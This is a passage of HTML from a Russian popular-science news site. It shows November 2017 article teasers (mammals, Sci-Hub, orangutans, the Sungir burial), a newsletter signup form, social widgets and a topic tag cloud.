      Млекопитающие стали дневными животными после вымирания динозавров
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news457731">
    
<a href="/news/2017/11/07/ps_rnf_imb/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2017/11/07/thumbs/ps_autoimmune_1510050288.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Макрофаг и биспецифичное антитело. Адаптировано из статьи Drutskaya M.S., Efimov G.A., Kruglov A.A., Nedospasov S.A. (2017) Journal of Leukocyte Biology, 102(3):783-790" title="Макрофаг и биспецифичное антитело. Адаптировано из статьи Drutskaya M.S., Efimov G.A., Kruglov A.A., Nedospasov S.A. (2017) Journal of Leukocyte Biology, 102(3):783-790" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Избирательная блокировка белков поможет в лечении астмы и артрита
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news457730">
    
<a href="/news/2017/11/07/ps_bones/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2017/11/07/thumbs/ps_Crocodile_Teeth_1510046792.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt=" " title=" " height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Отметины от зубов крокодилов на древних костях неотличимы от следов каменных орудий
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news457724">
    
<a href="/news/2017/11/07/ps_scihub/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2017/11/07/thumbs/ps_sci-hub-website_1510042030.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt=" " title=" " height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Американский суд потребовал заблокировать доступ к Sci-Hub
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-article52126">
    
<a href="/article/2017/11/06/ps_portland_vase/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2017/11/02/thumbs/detail_of_the_side_B_of_the_Portland_Vase_1509637529.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Деталь Портленской вазы" title="Деталь Портленской вазы" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      Максим Руссо
    
  
</div>

    <h4>
      Загадки Портлендской вазы
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-article52125">
    
<a href="/article/2017/11/05/ps_maruha/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2017/11/02/thumbs/Kikimora_im_Sumpf_by_V.I._Denisov_1509638992.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Картина Василия Денисова «Кикимора в трясине» (нач. XX века)" title="Картина Василия Денисова «Кикимора в трясине» (нач. XX века)" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      «Марухой обдирает» 
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-article52124">
    
<a href="/article/2017/11/04/ps_aspero/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2017/10/31/thumbs/Facial-reconstruction-woman-of-the-4-brooches_1509476502.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Лицевая реконструкция женщины из Асперо" title="Лицевая реконструкция женщины из Асперо" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      Максим Руссо
    
  
</div>

    <h4>
      Женщина из Асперо
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news457560">
    
<a href="/news/2017/11/03/ps_rnf_3d/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2017/11/03/thumbs/ps_3d_pr_1509719605.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt=" " title=" " height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Создан новый материал для 3D-печати на основе целлюлозы
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news457562">
    
<a href="/news/2017/11/03/ps_pictish_stone/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2017/11/03/thumbs/ps_Pictish-stone.-Photo-courtesy-The-Courier._1509706633.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt=" " title=" " height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Во время дорожных работ в Шотландии найден камень с древним изображением
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-article52153">
    
<a href="/article/2017/11/03/ps_pyramid/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2017/11/03/thumbs/ps_great_pyramid_1509698928.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt=" " title=" " height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      Максим Руссо
    
  
</div>

    <h4>
      Мюоны и пирамида Хеопса
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news457563">
    
<a href="/news/2017/11/03/ps_pongo_tapanuliensis/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2017/11/03/thumbs/ps_WEB_Batang-Toru-Maxime_Aliaga-39_copy_1509699080.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Pongo tapanuliensis" title="Pongo tapanuliensis" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Выделен новый вид орангутанов
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-article52152">
    
<a href="/article/2017/11/03/ps_sunghir/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2017/11/03/thumbs/ps_378489_1509696263.jpeg.0x142_q85_crop_cropsize-190x142.jpg" alt="Реконструкция захоронения детей со стоянки Сунгирь" title="Реконструкция захоронения детей со стоянки Сунгирь" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      Максим Руссо
    
  
</div>

    <h4>
      Сунгирь: мальчик… и еще мальчик!
    </h4>
  </div>
</a>

  </div>


  </div>
</div>

        
      
    </div>



<!--END #content-->

  
    
      
        
<div class="right-column ib-col">


<div class="pic-of-the-day-container"><!-- Begin MailChimp Signup Form -->
<style type="text/css">
	#mc_embed_signup{background:#fff; clear:left; font:14px Helvetica,Arial,sans-serif !important;  width:200px;}
.sub-form {font:14px Helvetica,Arial,sans-serif !important; margin: 0 0 5px 0;}
#mc_embed_signup form {display:block; position:relative; text-align:left; padding:10px 0 10px 3%}
#mc_embed_signup h2 {font-weight:bold; padding:0; margin:15px 0; font-size:1.4em;}
#mc_embed_signup input {border:1px solid #999; -webkit-appearance:none;}
#mc_embed_signup input[type=checkbox]{-webkit-appearance:checkbox;}
#mc_embed_signup input[type=radio]{-webkit-appearance:radio;}
#mc_embed_signup input:focus {border-color:#333;}
#mc_embed_signup .button {clear:both; background-color: #007854; border: 0 none; border-radius:4px; color: #FFFFFF; cursor: pointer; display: inline-block; font-size:15px; font-weight: bold; height: 32px; line-height: 32px; margin: 0 5px 10px 0; padding: 0 22px; text-align: center; text-decoration: none; vertical-align: top; white-space: nowrap; width: 96%;}
#mc_embed_signup .button:hover {background-color:#777;}
#mc_embed_signup .small-meta {font-size: 11px;}
#mc_embed_signup .nowrap {white-space:nowrap;}
#mc_embed_signup .mc-field-group {clear:left; position:relative; width:96%; padding-bottom:3%; min-height:50px;}
#mc_embed_signup .size1of2 {clear:none; float:left; display:inline-block; width:46%; margin-right:4%;}
* html #mc_embed_signup .size1of2 {margin-right:2%; /* Fix for IE6 double margins. */}
#mc_embed_signup .mc-field-group label {display:block; margin:5px 0 3px 0; color: #007854; font:14px Helvetica,Arial,sans-serif !important; }
#mc_embed_signup .mc-field-group input {display:block; width:100%; padding:8px 0; text-indent:2%;}
#mc_embed_signup .mc-field-group select {display:inline-block; width:99%; padding:5px 0; margin-bottom:2px;}
#mc_embed_signup .datefield, #mc_embed_signup .phonefield-us{padding:5px 0;}
#mc_embed_signup .datefield input, #mc_embed_signup .phonefield-us input{display:inline; width:60px; margin:0 2px; letter-spacing:1px; text-align:center; padding:5px 0 2px 0;}
#mc_embed_signup .phonefield-us .phonearea input, #mc_embed_signup .phonefield-us .phonedetail1 input{width:40px;}
#mc_embed_signup .datefield .monthfield input, #mc_embed_signup .datefield .dayfield input{width:30px;}
#mc_embed_signup .datefield label, #mc_embed_signup .phonefield-us label{display:none;}
#mc_embed_signup .indicates-required {text-align:right; font-size:11px; margin-right:4%;}
#mc_embed_signup .asterisk {color:#c60; font-size:200%;}
#mc_embed_signup .mc-field-group .asterisk {position:absolute; top:25px; right:10px;}
#mc_embed_signup .clear {clear:both;}
#mc_embed_signup .mc-field-group.input-group ul {margin:0; padding:5px 0; list-style:none;}
#mc_embed_signup .mc-field-group.input-group ul li {display:block; padding:3px 0; margin:0;}
#mc_embed_signup .mc-field-group.input-group label {display:inline;}
#mc_embed_signup .mc-field-group.input-group input {display:inline; width:auto; border:none;}
#mc_embed_signup div#mce-responses {float:left; top:-1.4em; padding:0em .5em 0em .5em; overflow:hidden; width:90%;margin: 0 5%; clear: both;}
#mc_embed_signup div.response {margin:1em 0; padding:1em .5em .5em 0; font-weight:bold; float:left; top:-1.5em; z-index:1; width:80%;}
#mc_embed_signup #mce-error-response {display:none;}
#mc_embed_signup #mce-success-response {color:#529214; display:none;}
#mc_embed_signup label.error {display:block; float:none; width:auto; margin-left:1.05em; text-align:left; padding:.5em 0;}
#mc-embedded-subscribe {clear:both; width:auto; display:block; margin:1em 0 1em 5%;}
#mc_embed_signup #num-subscribers {font-size:1.1em;}
#mc_embed_signup #num-subscribers span {padding:.5em; border:1px solid #ccc; margin-right:.5em; font-weight:bold;}
</style>
<div id="mc_embed_signup">
<form action="//Polit.us10.list-manage.com/subscribe/post?u=0b6ec527cecd8ef226e2c06cf&amp;id=697031daea" method="post" id="mc-embedded-subscribe-form" name="mc-embedded-subscribe-form" class="validate" target="_blank" novalidate>
    <div id="mc_embed_signup_scroll">
	<div class="proscience-subject">Подпишитесь</div>
<span class="sub-form">чтобы вовремя узнавать о новых спектаклях и других мероприятиях ProScience театра!</span>
<div class="mc-field-group">
	<label for="mce-FNAME">Имя  <span class="asterisk">*</span>
</label>
	<input type="text" value="" name="FNAME" class="required" id="mce-FNAME">
</div>
<div class="mc-field-group">
	<label for="mce-EMAIL">Ваш Email  <span class="asterisk">*</span>
</label>
	<input type="email" value="" name="EMAIL" class="required email" id="mce-EMAIL">
</div>
	<div id="mce-responses" class="clear">
		<div class="response" id="mce-error-response" style="display:none"></div>
		<div class="response" id="mce-success-response" style="display:none"></div>
	</div>    <!-- real people should not fill this in and expect good things - do not remove this or risk form bot signups-->
    <div style="position: absolute; left: -5000px;"><input type="text" name="b_0b6ec527cecd8ef226e2c06cf_697031daea" tabindex="-1" value=""></div>
    <div class="clear"><input type="submit" value="Подписаться" name="subscribe" id="mc-embedded-subscribe" class="button"></div>
    </div>
  </div>
</form>
</div>
<script type='text/javascript' src='//s3.amazonaws.com/downloads.mailchimp.com/js/mc-validate.js'></script><script type='text/javascript'>(function($) {window.fnames = new Array(); window.ftypes = new Array();fnames[1]='FNAME';ftypes[1]='text';fnames[0]='EMAIL';ftypes[0]='email';fnames[2]='LNAME';ftypes[2]='text';fnames[3]='MMERGE3';ftypes[3]='text'; /*
 * Translated default messages for the $ validation plugin.
 * Locale: RU
 */
$.extend($.validator.messages, {
        required: "Это поле необходимо заполнить.",
        remote: "Пожалуйста, введите правильное значение.",
        email: "Пожалуйста, введите корректный адрес электронной почты.",
        url: "Пожалуйста, введите корректный URL.",
        date: "Пожалуйста, введите корректную дату.",
        dateISO: "Пожалуйста, введите корректную дату в формате ISO.",
        number: "Пожалуйста, введите число.",
        digits: "Пожалуйста, вводите только цифры.",
        creditcard: "Пожалуйста, введите правильный номер кредитной карты.",
        equalTo: "Пожалуйста, введите такое же значение ещё раз.",
        accept: "Пожалуйста, выберите файл с правильным расширением.",
        maxlength: $.validator.format("Пожалуйста, введите не больше {0} символов."),
        minlength: $.validator.format("Пожалуйста, введите не меньше {0} символов."),
        rangelength: $.validator.format("Пожалуйста, введите значение длиной от {0} до {1} символов."),
        range: $.validator.format("Пожалуйста, введите число от {0} до {1}."),
        max: $.validator.format("Пожалуйста, введите число, меньшее или равное {0}."),
        min: $.validator.format("Пожалуйста, введите число, большее или равное {0}.")
});}(jQuery));var $mcj = jQuery.noConflict(true);</script>
<!--End mc_embed_signup-->

  <div class="left-or-right-top-banner-slot"></div>
  <!-- VK Widget -->
  <div id="vk_groups"></div>
  <script type="text/javascript">
    VK.Widgets.Group("vk_groups", {mode: 0, width: "234", height: "10", color1: 'FFFFFF', color2: '2B587A', color3: '5B7FA6'}, 51195407);
  </script>

  <div class="tweetbox">
<a class="twitter-timeline" href="https://twitter.com/ProScienceNews" data-widget-id="349552013031374849" data-chrome="nofooter" lang="ru" data-tweet-limit="4" rel="nofollow">@ProScienceNews</a>
<script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0],p=/^http:/.test(d.location)?'http':'https';if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=p+"://platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script>
  </div>
  
  


  

<div class="tags-cloud">

  
  <a href="/tag/3d/" class="weight6">3D</a>
  

  

  
  <a href="/tag/apple/" class="weight10 force-hi">Apple</a>
  

  

  
  <a href="/tag/big_data/" class="weight4">Big data</a>
  

  

  

  
  <a href="/tag/dragon/" class="weight3">Dragon</a>
  

  

  

  
  <a href="/tag/facebook/" class="weight10">Facebook</a>
  

  
  <a href="/tag/google/" class="weight10 force-hi">Google</a>
  

  
  <a href="/tag/gps/" class="weight3">GPS</a>
  

  

  
  <a href="/tag/ibm/" class="weight4">IBM</a>
  

  

  
  <a href="/tag/iphone/" class="weight9">iPhone</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/coronavirus/" class="weight7">MERS</a>
  

  

  

  
  <a href="/tag/pro-science-video/" class="weight0 macrotag">PRO SCIENCE видео</a>
  

  
  <a href="/tag/proscience-theatre/" class="weight11 force-hi macrotag">ProScience Театр</a>
  

  
  <a href="/tag/spacex/" class="weight6">SpaceX</a>
  

  
  <a href="/tag/tesla-motors/" class="weight3">Tesla Motors</a>
  

  

  

  
  <a href="/tag/wi-fi/" class="weight5">Wi-Fi</a>
  

  

  

  

  

  
  <a href="/tag/Adyghe/" class="weight5">Адыгея</a>
  

  

  

  

  

  

  

  
  <a href="/tag/aleksandr-lavrov/" class="weight1">Александр Лавров</a>
  

  

  

  

  

  

  
  <a href="/tag/alternative_energy/" class="weight8">альтернативная энергетика</a>
  

  

  
  <a href="/tag/anastasiya-volochkova/" class="weight2">Анастасия Волочкова</a>
  

  

  
  <a href="/tag/angara_rocket/" class="weight5">«Ангара»</a>
  

  

  

  

  

  
  <a href="/tag/antibiotics/" class="weight3">антибиотики</a>
  

  
  <a href="/tag/antichnost/" class="weight9">античность</a>
  

  

  

  
  <a href="/tag/archeology/" class="weight11 force-hi">археология</a>
  

  
  <a href="/tag/architecture/" class="weight8">архитектура</a>
  

  
  <a href="/tag/asteroids/" class="weight6">астероиды</a>
  

  

  
  <a href="/tag/astrophysics/" class="weight8 force-hi">астрофизика</a>
  

  
  <a href="/tag/autism/" class="weight3">аутизм </a>
  

  
  <a href="/tag/Bajkonur/" class="weight8 force-hi">Байконур</a>
  

  
  <a href="/tag/bacteria/" class="weight8">бактерии</a>
  

  

  

  
  <a href="/tag/poverty/" class="weight3">бедность</a>
  

  

  
  <a href="/tag/biblioonline/" class="weight6">библиотека онлайн</a>
  

  
  <a href="/tag/library/" class="weight7">библиотеки</a>
  

  

  
  <a href="/tag/biology/" class="weight12 force-hi">биология </a>
  

  
  <a href="/tag/life_sciences/" class="weight7">биомедицина</a>
  

  
  <a href="/tag/biomechanics/" class="weight3">биомеханика</a>
  

  
  <a href="/tag/bionika/" class="weight5">бионика</a>
  

  

  
  <a href="/tag/biodiversity/" class="weight10">биоразнообразие</a>
  

  

  
  <a href="/tag/biotehnologii/" class="weight6">биотехнологии</a>
  

  

  

  

  
  <a href="/tag/blogosfera/" class="weight8">блогосфера</a>
  

  

  
  <a href="/tag/Higgs_boson/" class="weight2 force-hi">бозон Хиггса</a>
  

  

  
  <a href="/tag/british_cinema/" class="weight2">британское кино</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/Byzantine_Empire/" class="weight1">Византия</a>
  

  
  <a href="/tag/visual-anthropology/" class="weight4">визуальная антропология</a>
  

  
  <a href="/tag/viking/" class="weight5">викинги</a>
  

  
  <a href="/tag/virus/" class="weight9 force-hi">вирусы</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/Free_Historical_Society/" class="weight5">Вольное историческое общество</a>
  

  

  

  
  <a href="/tag/universe/" class="weight6">Вселенная</a>
  

  
  <a href="/tag/volcanology/" class="weight4">вулканология</a>
  

  
  <a href="/tag/editors_choice/" class="weight5">Выбор редакции</a>
  

  

  

  
  <a href="/tag/gadget/" class="weight9">гаджеты</a>
  

  

  
  <a href="/tag/genetics/" class="weight10 force-hi">генетика</a>
  

  

  

  
  <a href="/tag/geography/" class="weight6">география</a>
  

  

  
  <a href="/tag/geology/" class="weight8">геология</a>
  

  
  <a href="/tag/geophysics/" class="weight3">геофизика</a>
  

  

  

  

  
  <a href="/tag/global_warming/" class="weight6">глобальное потепление</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/griby/" class="weight5">грибы</a>
  

  

  
  <a href="/tag/flu/" class="weight8">грипп </a>
  

  

  

  
  <a href="/tag/dolphins/" class="weight4">дельфины</a>
  

  
  <a href="/tag/demography/" class="weight7">демография</a>
  

  

  

  
  <a href="/tag/deti/" class="weight12 force-hi">дети</a>
  

  

  

  

  

  
  <a href="/tag/dinosaurs/" class="weight7">динозавры</a>
  

  

  
  <a href="/tag/dmitrij-strashnov/" class="weight3">Дмитрий Страшнов </a>
  

  
  <a href="/tag/DNA/" class="weight7 force-hi">ДНК</a>
  

  
  <a href="/tag/drevnij-egipet/" class="weight7">Древний Египет</a>
  

  

  

  

  

  
  <a href="/tag/natural_sciences/" class="weight10 force-hi macrotag">естественные и точные науки</a>
  

  

  
  <a href="/tag/zhivotnye/" class="weight11 force-hi">животные</a>
  

  
  <a href="/tag/out-earth-life/" class="weight6">жизнь вне Земли</a>
  

  

  
  <a href="/tag/West-Africa/" class="weight8">Западная Африка</a>
  

  
  <a href="/tag/habilitation/" class="weight8">защита диссертаций</a>
  

  
  <a href="/tag/zemletryasenie/" class="weight11 force-hi">землетрясение</a>
  

  

  
  <a href="/tag/zmei/" class="weight2">змеи</a>
  

  
  <a href="/tag/zoopark/" class="weight6">зоопарк</a>
  

  
  <a href="/tag/viision/" class="weight5">зрение</a>
  

  

  

  

  
  <a href="/tag/jerusalem/" class="weight6">Иерусалим</a>
  

  

  
  <a href="/tag/inventions/" class="weight6 force-hi">изобретения</a>
  

  
  <a href="/tag/immunology/" class="weight6">иммунология</a>
  

  

  

  
  <a href="/tag/innovation/" class="weight10 force-hi">инновации</a>
  

  

  
  <a href="/tag/internet/" class="weight13 force-hi">интернет</a>
  

  
  <a href="/tag/infekcii/" class="weight7">инфекции</a>
  

  
  <a href="/tag/informacionnye-tekhnologii/" class="weight9">информационные технологии</a>
  

  

  
  <a href="/tag/artificial_intellect/" class="weight5">искусственный интеллект</a>
  

  
  <a href="/tag/islam/" class="weight11 force-hi">ислам</a>
  

  

  
  <a href="/tag/politics_of_history/" class="weight6">историческая политика</a>
  

  
  <a href="/tag/history/" class="weight12 force-hi">история</a>
  

  
  <a href="/tag/istoriya-iskusstva/" class="weight8">история искусства</a>
  

  
  <a href="/tag/Russia_history/" class="weight9">история России</a>
  

  
  <a href="/tag/civilization_history/" class="weight6">история цивилизаций</a>
  

  
  <a href="/tag/transition/" class="weight6">История человека. История институтов</a>
  

  
  <a href="/tag/endangered-languages/" class="weight5">исчезающие языки</a>
  

  

  

  

  

  

  

  
  <a href="/tag/cartoon/" class="weight7">карикатура</a>
  

  

  

  
  <a href="/tag/katolicizm/" class="weight7">католицизм</a>
  

  
  <a href="/tag/quantum_physics/" class="weight7">квантовая физика</a>
  

  
  <a href="/tag/quantum_technology/" class="weight4">квантовые технологии</a>
  

  
  <a href="/tag/kgi/" class="weight8">КГИ</a>
  

  

  

  

  

  
  <a href="/tag/whales/" class="weight5 force-hi">киты</a>
  

  
  <a href="/tag/climatology/" class="weight7">климатология</a>
  

  

  

  

  
  <a href="/tag/comet/" class="weight4">комета</a>
  

  
  <a href="/tag/comets/" class="weight5">кометы</a>
  

  
  <a href="/tag/comparativistics/" class="weight3 force-hi">компаративистика</a>
  

  
  <a href="/tag/computer-security/" class="weight8">компьютерная безопасность</a>
  

  
  <a href="/tag/kompyuternye-tehnologii/" class="weight9">компьютерные технологии</a>
  

  

  

  

  

  

  
  <a href="/tag/debris/" class="weight1 force-hi">космический мусор</a>
  

  

  

  
  <a href="/tag/space/" class="weight13 force-hi">космос</a>
  

  
  <a href="/tag/forensics/" class="weight5">криминалистика </a>
  

  

  

  
  <a href="/tag/kultura/" class="weight10 force-hi">культура</a>
  

  
  <a href="/tag/anthropology/" class="weight7">культурная антропология</a>
  

  

  
  <a href="/tag/laser/" class="weight5">лазер</a>
  

  

  
  <a href="/tag/Latin_America/" class="weight6">Латинская Америка</a>
  

  

  
  <a href="/tag/lexic/" class="weight1">лексика</a>
  

  

  
  <a href="/tag/anti-science/" class="weight5">лженаука</a>
  

  

  
  <a href="/tag/linguistics/" class="weight9">лингвистика</a>
  

  

  
  <a href="/tag/luna/" class="weight8">Луна</a>
  

  

  

  
  <a href="/tag/mamonty/" class="weight4">мамонты</a>
  

  

  

  
  <a href="/tag/mars/" class="weight8">Марс</a>
  

  

  
  <a href="/tag/math/" class="weight9">математика</a>
  

  
  <a href="/tag/science-of-materials/" class="weight6">материаловедение</a>
  

  

  
  <a href="/tag/mgu/" class="weight9">МГУ</a>
  

  

  
  <a href="/tag/medicine/" class="weight13 force-hi">медицина</a>
  

  
  <a href="/tag/interdisciplinary_research/" class="weight8 force-hi macrotag">междисциплинарные исследования</a>
  

  

  

  
  <a href="/tag/selfgovernment/" class="weight4">местное самоуправление</a>
  

  
  <a href="/tag/meteorite/" class="weight8">метеориты</a>
  

  

  
  <a href="/tag/microbiology/" class="weight5">микробиология</a>
  

  

  

  
  <a href="/tag/minobrnauki/" class="weight10 force-hi">Минобрнауки</a>
  

  

  
  <a href="/tag/mithology/" class="weight5">мифология</a>
  

  

  
  <a href="/tag/mammal/" class="weight7 force-hi">млекопитающие</a>
  

  

  
  <a href="/tag/apps/" class="weight9 force-hi">мобильные приложения</a>
  

  
  <a href="/tag/brain/" class="weight8">мозг</a>
  

  

  
  <a href="/tag/mollusk/" class="weight3 force-hi">моллюски</a>
  

  
  <a href="/tag/Mongolia/" class="weight4">Монголия</a>
  

  

  

  

  
  <a href="/tag/muzei/" class="weight9">музеи</a>
  

  

  

  
  <a href="/tag/nasa/" class="weight9 force-hi">НАСА</a>
  

  
  <a href="/tag/nasekomye/" class="weight9">насекомые</a>
  

  

  

  

  

  
  <a href="/tag/neandertalcy/" class="weight5">неандертальцы</a>
  

  
  <a href="/tag/neirobiology/" class="weight8">нейробиология</a>
  

  
  <a href="/tag/neolit/" class="weight4">неолит</a>
  

  

  
  <a href="/tag/Nobel_prize/" class="weight10 force-hi">Нобелевская премия</a>
  

  

  

  
  <a href="/tag/npo-im-lavochkina/" class="weight1">НПО им.Лавочкина</a>
  

  

  

  
  <a href="/tag/apes/" class="weight6">обезьяны</a>
  

  

  
  <a href="/tag/learning/" class="weight5">обучение </a>
  

  
  <a href="/tag/society/" class="weight8 force-hi macrotag">общество</a>
  

  
  <a href="/tag/OGI/" class="weight5">О.Г.И.</a>
  

  

  

  

  

  
  <a href="/tag/cancer/" class="weight6">онкология</a>
  

  

  

  

  

  
  <a href="/tag/discovery/" class="weight7 force-hi">открытия</a>
  

  

  

  
  <a href="/tag/paleolit/" class="weight6">палеолит</a>
  

  
  <a href="/tag/paleontology/" class="weight9">палеонтология</a>
  

  

  
  <a href="/tag/memory/" class="weight6">память</a>
  

  
  <a href="/tag/papyri/" class="weight3">папирусы</a>
  

  
  <a href="/tag/parasites/" class="weight4">паразиты</a>
  

  

  
  <a href="/tag/pedagogics/" class="weight3">педагогика </a>
  

  

  

  

  
  <a href="/tag/planetology/" class="weight9 force-hi">планетология</a>
  

  

  
  <a href="/tag/pogoda/" class="weight11 force-hi">погода</a>
  

  
  <a href="/tag/podgotovka-kosmonavtov/" class="weight8">подготовка космонавтов</a>
  

  

  

  

  

  

  

  
  <a href="/tag/enlightenment/" class="weight8">популяризация науки</a>
  

  
  <a href="/tag/law/" class="weight8">право</a>
  

  

  
  <a href="/tag/teaching_history/" class="weight5">преподавание истории</a>
  

  

  

  

  

  

  

  
  <a href="/tag/life_interval/" class="weight3">продолжительность жизни</a>
  

  

  

  
  <a href="/tag/homo-sapiens/" class="weight7">происхождение человека</a>
  

  

  
  <a href="/tag/proton-m/" class="weight8">Протон-М</a>
  

  

  
  <a href="/tag/psychoanalysis/" class="weight3">психоанализ</a>
  

  
  <a href="/tag/psycology/" class="weight8">психология</a>
  

  
  <a href="/tag/psychophysiology/" class="weight7">психофизиология</a>
  

  
  <a href="/tag/pticy/" class="weight8">птицы</a>
  

  

  
  <a href="/tag/radioastron/" class="weight2">РадиоАстрон</a>
  

  

  
  <a href="/tag/raketa/" class="weight9">ракета</a>
  

  

  

  

  
  <a href="/tag/rasteniya/" class="weight8">растения</a>
  

  

  
  <a href="/tag/rbc/" class="weight8">РБК</a>
  

  
  <a href="/tag/rvk/" class="weight7 force-hi">РВК</a>
  

  
  <a href="/tag/rggu/" class="weight7">РГГУ</a>
  

  

  
  <a href="/tag/area_studies/" class="weight6">регионоведение</a>
  

  

  
  <a href="/tag/religious_studies/" class="weight6">религиоведение</a>
  

  
  <a href="/tag/reptilii/" class="weight6">рептилии</a>
  

  

  
  <a href="/tag/rkk-energiya/" class="weight6">РКК «Энергия»</a>
  

  

  

  
  <a href="/tag/robototehnika/" class="weight9">робототехника</a>
  

  
  <a href="/tag/roskosmos/" class="weight11 force-hi">Роскосмос</a>
  

  
  <a href="/tag/rospatent/" class="weight5">Роспатент</a>
  

  

  

  

  

  

  
  <a href="/tag/russian/" class="weight9">русский язык</a>
  

  
  <a href="/tag/ryby/" class="weight8">рыбы</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/heart/" class="weight2 force-hi">сердце</a>
  

  
  <a href="/tag/serials/" class="weight5">сериалы</a>
  

  
  <a href="/tag/singapore/" class="weight6">Сингапур</a>
  

  

  
  <a href="/tag/shale_revolution/" class="weight3">сланцевая революция</a>
  

  
  <a href="/tag/mortality/" class="weight5">смертность</a>
  

  
  <a href="/tag/mass_media/" class="weight10 force-hi">СМИ</a>
  

  
  <a href="/tag/sun/" class="weight4">Солнце</a>
  

  
  <a href="/tag/son/" class="weight4">сон</a>
  

  

  
  <a href="/tag/sociology/" class="weight9">социология</a>
  

  

  

  

  

  

  
  <a href="/tag/sputnik/" class="weight10 force-hi">спутники</a>
  

  

  

  
  <a href="/tag/aging/" class="weight1">старение</a>
  

  
  <a href="/tag/staroobryadcy/" class="weight3">старообрядцы</a>
  

  
  <a href="/tag/startup/" class="weight8">стартапы</a>
  

  
  <a href="/tag/statistics/" class="weight7">статистика</a>
  

  

  

  
  <a href="/tag/taxi/" class="weight4">такси</a>
  

  

  

  

  

  

  

  
  <a href="/tag/technology/" class="weight8 macrotag">технологии</a>
  

  
  <a href="/tag/tigry/" class="weight6">тигры</a>
  

  

  

  

  
  <a href="/tag/tornado/" class="weight5">торнадо</a>
  

  
  <a href="/tag/transportation/" class="weight11 force-hi">транспорт</a>
  

  

  

  

  
  <a href="/tag/uragan/" class="weight8">ураган</a>
  

  
  <a href="/tag/urbanistika/" class="weight6">урбанистика</a>
  

  

  

  
  <a href="/tag/pharmacology/" class="weight9">фармакология</a>
  

  

  
  <a href="/tag/festival-publichnyh-lekcij/" class="weight9">Фестиваль публичных лекций</a>
  

  
  <a href="/tag/physics/" class="weight10 force-hi">физика</a>
  

  
  <a href="/tag/fiziologiya/" class="weight7">физиология</a>
  

  
  <a href="/tag/physicalantropology/" class="weight8">физическая антропология</a>
  

  

  

  

  
  <a href="/tag/Financial_market/" class="weight1">финансовый рынок</a>
  

  

  
  <a href="/tag/folklore/" class="weight6">фольклор</a>
  

  

  

  

  

  

  
  <a href="/tag/chemistry/" class="weight9">химия</a>
  

  
  <a href="/tag/christianity/" class="weight8">христианство</a>
  

  

  
  <a href="/tag/hrunichev_center/" class="weight4">Центр им.Хруничева</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/schcool/" class="weight11 force-hi">школа</a>
  

  
  <a href="/tag/school_tournaments/" class="weight3">школьные олимпиады</a>
  

  

  

  
  <a href="/tag/evolution/" class="weight9 force-hi">эволюция </a>
  

  
  <a href="/tag/human-evolution/" class="weight7">эволюция человека</a>
  

  
  <a href="/tag/ecology/" class="weight11 force-hi">экология</a>
  

  

  

  
  <a href="/tag/embrionalnoe-razvitie/" class="weight3">эмбриональное развитие</a>
  

  
  <a href="/tag/epidemii/" class="weight9">эпидемии</a>
  

  

  

  
  <a href="/tag/ethics/" class="weight1">этика</a>
  

  
  <a href="/tag/etnicheskie-konflikty/" class="weight1">этнические конфликты</a>
  

  

  
  <a href="/tag/etology/" class="weight9">этология</a>
  

  

  

  
